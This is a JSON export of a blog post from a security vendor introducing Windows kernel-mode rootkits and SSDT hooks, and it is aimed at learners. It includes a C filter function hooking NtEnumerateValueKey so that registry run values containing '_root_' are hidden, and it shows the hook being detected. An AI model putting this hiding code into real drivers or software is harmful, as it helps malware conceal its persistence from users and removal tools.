{"id":214,"date":"2014-06-28T06:41:10","date_gmt":"2014-06-28T06:41:10","guid":{"rendered":"http:\/\/www.adlice.com\/?p=214"},"modified":"2022-12-21T10:39:54","modified_gmt":"2022-12-21T10:39:54","slug":"kernelmode-rootkits-part-1-ssdt-hooks","status":"publish","type":"post","link":"https:\/\/www.adlice.com\/es\/kernelmode-rootkits-part-1-ssdt-hooks\/","title":{"rendered":"KernelMode Rootkits: Part 1, SSDT hooks"},"content":{"rendered":"\n

This is the first part of this series about Kernel Mode rootkits<\/strong>, I wanted to write on it and demonstrate how some rootkits (Ex: Necurs) do to hide their presence and protect themselves from removal<\/strong> by using SSDT hooks.<\/p>\n\n\n\n

I’ll first introduce what is KernelMode (against UserLand), then what is SSDT, and to finish demonstrate how a hook can be made, detected, and removed. This post is about a classic trick<\/strong>, known for decades. Malware specialists may know this already, so this is mostly an introduction for whom willing to learn the theory of rootkits, and have a demonstration. Call that beginners if you want \ud83d\ude42<\/p>\n\n\n\n


Kernel Mode<\/h4>\n\n\n\n

Hard to explain better than Microsoft itself<\/a><\/strong>. There are basically 2 address spaces in Windows<\/strong>, where applications can only be part of one of them. This means an application is either designed to run in user mode (classic application, apps with user interface, services, …)<\/strong> or in kernel mode (kernel mode drivers)<\/strong>.<\/p>\n\n\n\n

Usually, high level programs run in user mode, while low level programs run in kernel mode<\/strong>. User mode process address space is private (and virtual)<\/strong>, this means that from inside a process context, all the processes see the same address range. However, writing to a given virtual address writes to a different physical address according to the process context we are. When some unexpected thing happens in user mode, only the process crashes<\/strong>.<\/p>\n\n\n\n

Unlike user mode, kernel mode address space is shared<\/strong>. This means we can read\/write to the memory of any other process<\/strong>. Kernel Mode is very critical because of this (and because it’s low level), because if something unexpected happen and isn’t handled correctly, but have a BSoD. <\/strong>
 <\/p>\n\n\n\n

\"Src:<\/a>
Src: Microsoft<\/figcaption><\/figure>\n\n\n\n


SSDT (System Service Dispatch Table)<\/h4>\n\n\n\n

The System Service Dispatch Table<\/a> is a table containing pointers to service functions (APIs) in ntoskrnl.exe (NtOpenProcess, NtOpenThread, … ).<\/p>\n\n\n\n

Make of a hook in this table consist to replace the original pointer value of an entry (let’s take NtOpenProcess for the example) by the address of a function with the same prototype in any kernel mode loaded module.<\/strong> Usually, detouring an API is only made to filter the input parameters<\/strong> (and deny access if needed) and return the original pointer value at the end of the processing<\/strong>, to call the original function.<\/p>\n\n\n\n

Any loaded module can then detour the execution flow of an API to filter<\/strong> any attempt to open a handle on a process (in our example). This is very important, because a handle with enough rights is needed to kill a process with NtTerminateProcess. If we deny the call to NtOpenProcess, no program will be able to kill a given process (in theory…).<\/p>\n\n\n\n

SSDT hooks are used by malware to self-protect and hide their ass, and by antivirus vendors<\/strong> (on old systems) to filter system access (process starts, registry write, …).
 <\/p>\n\n\n\n

\"Before<\/a>
Before hook (Clean system)<\/figcaption><\/figure>\n\n\n\n
\"After<\/a>
After hook (System compromised)<\/figcaption><\/figure>\n\n\n\n


Practical case: Hide a registry value<\/h4>\n\n\n\n

I didn’t say ‘protect’, but HIDE. Imagine you’re a malware writer, and you need to hide the persistence item of your piece of code and let’s imagine it’s a RUN value<\/strong>. You don’t want anyone to be able to remove your malware so you hide it (Of course you need to protect the file as well, but that’s not a how-to-make-a-virus here). Disclaimer: This is not a tutorial to make a rootkit, but a practical case for educational purpose only.<\/strong> Anyway, this is covered for decades on other websites…<\/p>\n\n\n\n

I’ll not show you how to hook the SSDT, it’s very well explained here<\/a>. I’ll just write the hooking filter function. We want to hide a registry value, so we will target the NtEnumerateValueKey API.<\/a><\/strong> I haven’t told before, but as it’s kernel mode code, you’d need to code a driver.<\/a><\/p>\n\n\n\n

NTSTATUS NewZwEnumerateValueKey(IN HANDLE KeyHandle,IN ULONG Index,IN KEY_VALUE_INFORMATION_CLASS KeyValueInformationClass, \n                                OUT PVOID KeyValueInformation OPTIONAL, IN  ULONG Length, OUT PULONG ResultLength)\n{\n    NTSTATUS ntStatus;\n    PWSTR ValueName;\n    \n    \/\/ Call the original API (NtEnumerateValueKey)\n    ntStatus = ((ZWENUMERATEVALUEKEY)(OldZwEnumerateValueKey)) (KeyHandle, Index, KeyValueInformationClass, KeyValueInformation, Length, ResultLength);\n    \n    \/\/ Get value name\n    if (KeyValueInformationClass == KeyValueFullInformation)\n    {\n        ValueName = ((PKEY_VALUE_FULL_INFORMATION)KeyValueInformation)-&gt;Name;   \n  \n        \/\/ If the registry value name contains _root_ we increment the index and call the API a second time, hiding the first call results.\n        if (ValueName != NULL &amp;&amp; wcsstr(ValueName, L\"_root_\") != NULL)\n        {\n            DbgPrint(\"[ENUMVALUE] %d [%d] -- %ws\\n\", Index, KeyValueInformationClass, ValueName);\n            \n            \/\/ Skip index\n            Index++;\n            ValueName = NULL;       \n            return ((ZWENUMERATEVALUEKEY)(OldZwEnumerateValueKey)) (KeyHandle, Index, KeyValueInformationClass, KeyValueInformation, Length, ResultLength);\n        }\n    }    \n    return ntStatus;\n}\n<\/code><\/pre>\n\n\n\n

The code is self explaining, fully commented.<\/strong>
If the value name contains the string “_root_”, we call the API a second time to hide the results of the first call.<\/strong>
This means we don’t get any information about the hidden value.
 <\/p>\n\n\n\n
\"Before<\/a>
Before hook<\/figcaption><\/figure>\n\n\n\n
\"After<\/a>
After hook<\/figcaption><\/figure>\n\n\n\n
\"Debugger<\/a>
Debugger view<\/figcaption><\/figure>\n\n\n\n
\"RogueKiller<\/a>
RogueKiller detects the hook…<\/figcaption><\/figure>\n\n\n\n
A demo of the rootkit is available here: <\/strong><\/p>\n\n\n\n
\n